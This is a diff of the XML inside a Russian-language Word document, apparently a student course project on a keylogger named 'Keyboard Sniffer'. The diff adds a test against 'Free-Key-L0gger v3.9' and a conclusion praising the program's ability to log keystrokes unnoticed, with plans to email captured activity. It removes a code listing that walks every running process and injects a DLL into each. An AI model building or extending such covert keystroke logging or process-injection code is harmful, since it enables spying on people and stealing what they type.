+        <w:t>Free</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Key</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>L</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>gger</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>3.9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Запустим приложение</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Сниффер Кливиатуры</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Free</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Key</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>L</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>gger</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>3.9”.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">В поле адреса браузер </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Mozilla</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Firefox</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">введем тестовую строку </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>qwerty</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1234567890” </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">и дважды нажмем системную клавишу </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Left</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>. После чего сравним результаты работы двух программ.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
       <w:bookmarkStart w:id="1" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="1"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">части системы, которые будут включены в снимок. Для получения снимка всех процессов — это параметр должен устанавливаться в </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>TH32CS_SNAPPROCESS</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>DWORD</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>th</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>32</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ProcessID</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>для</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dwFlags</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>TH32CS_SNAPPROCESS</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>этот</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>параметр</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>игнорируется</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Если функция завершается успешно, она возвращает открыты</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>й дескриптор к указанному снимку</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
+        <w:ind w:left="360"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:bookmarkStart w:id="2" w:name="_Toc414805630"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Заключение</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>5.5.1 Листинг кода инжекции в процессы, полученные в снимке</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>if (hProcessSnap == INVALID_HANDLE_VALUE)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>return FALSE;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>pe32.dwSize = sizeof(PROCESSENTRY32);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>do {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>if (!Process3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>2Next(hProcessSnap, &amp;pe32))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>return FALSE;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>if (Inject(pe32.th32ProcessID, dllPath))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>std::cout &lt;&lt; "Injection success:" &lt;&lt; pe32.szExeFile &lt;&lt; std::endl;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>} whil</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>e (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>true);</w:t>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>В ходе выполнения курсового проекта были спроектиро</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">вана и разработана программ для отслеживания и записи активности пользователя </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>С</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ниффер</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> клавиатуры</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Приложение способно отслеживать нажатие клавиш и изменение текущего окна, также приложение способно работать незаметно для пользователя, не вызывая подозрений.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>В будущем планируется расширение функционала приложения, возможность отправки информации об активности пользователя на почту, сохранение информации в базе данных, для боле</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>е удобной работы, поиска, сортировки информации.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9153,57 +9985,40 @@
         <w:ind w:firstLine="708"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="708"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-      <w:bookmarkStart w:id="2" w:name="_Toc414805630"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:sz w:val="36"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Заключение</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="2"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">В ходе разработки данного проекта, были получены обширные знания в разработке системного программного обеспечения для </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
